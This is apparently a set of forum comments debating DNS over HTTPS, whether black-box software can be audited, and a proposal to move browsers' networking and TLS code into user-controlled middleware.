Edit: So that's tunneled DNS.
You could also call it encrypted DNS, I suppose. But then, you could say something similar about VPNs, instead of calling them tunnels.
Hard-coded authenticated DNS would be hard too, but it's at least possible that you could see what resolver it's using.
That will remove their most cherished authority, so clearly they would hate it and come up with endless fake excuses, but that's why open source matters.
If you want to trust it you have to be able to audit its workings. There is no magic sauce from a network layer that gets around this step and after this step nothing else is needed.
This is the fundamental problem; we provably cannot even know if the black box will even halt[1], we obviously cannot audit any it for behaviors far more complex than simply halting. Even worse, if the black box is equivalent to a Turing machine with more than ~8k states, it's behavior cannot be described in ZF set theory[2].
> There is no magic sauce from a network layer
As long as the black box is Turing complete, any noisy channel[3] to the network it can influence can be used as a foundation for reliable digital channel. The solution is to limit the black box to such that it is not Turing complete. The decision problems about its behavior must be decidable.
A good example of a limited design is the original World Wide Web. HTML with 3270-style forms (or an updated version that is better looking with modernized form tags) was decidable, with the undecidable complexity sandboxed on the server. The instructions to the client (HTML) and the communications with the server (links/URLs, POSTed form field) are understandable by both humans and machines.
Today's web requires trusting a new set of undecidable software on each page load. We're supposed to trust 3rd parties even though trust is not transitive. We're supposed to accept the risk of running 3rd party software even though risk is transitive. Now these problems are leaking into other areas like DNS, and the Users lose yet another battle in the War On General Purpose Computing[4][5].
[1] https://en.wikipedia.org/wiki/Halting_problem
[2] https://www.scottaaronson.com/blog/?p=2725
[3] https://en.wikipedia.org/wiki/Noisy-channel_coding_theorem
It's open middleware, just like the glibc resolver. For example, it's entirely possible to force applications to use the glibc resolver, just dont let them open sockets to anything but 127.0.0.1:53. They wouldnt be able to use http/https either in that case, but that's the point.
If you are thinking about side-channels like HTTP over DNS(S), then fine, but the middleware can see the traffic because that's it's job. If the app starts making encrypted requests atleast you would know, and since it's open source the user can fix it and tell everyone the application is using a side-channel to subvert the user.
_But that missed the point._ The app wouldnt have DNS code in it. It would only be able to ask to map a name to a record. And even then, that misses the point too. In the end it wants to fetch a URL, and what I am talking about does that. Firefox parses a GET it was handed, and if it wants to make additional GET/POST's, then hand them over. No DNS or networking code needed in the browser. Linking to a SSL lib would be a bug.
Reaching into an arb open source app and getting ahold of it's SSL machinery to MITM it is always a moving target (aka deliberate problem), and that's an anti-user feature.
Common middleware that handels the comms (SSL etc) (os or application level) levels the playing field. The recent DoH changes would have been up to the user, because that code isnt in the browser any more. Users are leveraged by the browser vendors, "want the latest version?" "hey I see you are using a 0-day browser?" and forced to swallow or fork. I realize users can disable DoH, but again, that's the point. It's a moving target. They can just keep "fixing" the defaults.
Same thing with Chrome's recent changes regarding the DOM blocking API. If Chrome was forced to deal with asing for URL's instead of fetching them directly, it wouldnt matter. The blockers would operate in the middleware.
As I mentioned in my original comment, the point is to axe the networking code from the applications, and force them to make requests a layer up. This is not like forcing them thorugh a SOCKS proxy. It's deduplicating the code, and making the parts seperable. The monolithic nature of browsers isn't some accident.